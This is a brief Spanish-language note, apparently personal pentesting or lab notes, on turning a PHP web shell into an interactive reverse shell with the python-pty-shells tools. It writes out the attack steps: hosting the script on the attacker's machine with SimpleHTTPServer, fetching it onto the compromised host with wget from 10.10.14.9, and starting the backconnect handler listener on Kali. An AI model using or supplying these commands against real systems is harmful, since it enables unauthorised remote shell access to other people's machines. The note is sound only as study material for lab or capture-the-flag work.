https://github.com/infodox/python-pty-shells

Puedes si tienes una php shell o algo asi feo subirle algun python y conectarlo a la consola normal.

Lo que tiene que hacer es, en tu host hacer un servidor

python -m SimpleHTTPServer 8001

o ponerlo ahí de alguna manera.

editar el backoneect y bajarlo 

wget http://10.10.14.9:8001/tcp_pty_backconnect.py

encender el lsitener donde el IP es el de la maquina donde quieres la consola osea tu ln0 el puerto que editaste y -b que no tiene sentido pero asi es…

root@kali:/usr/share/python-pty-shells-master# python tcp_pty_shell_handler.py 10.10.14.9:9091 -b

y tienes la consola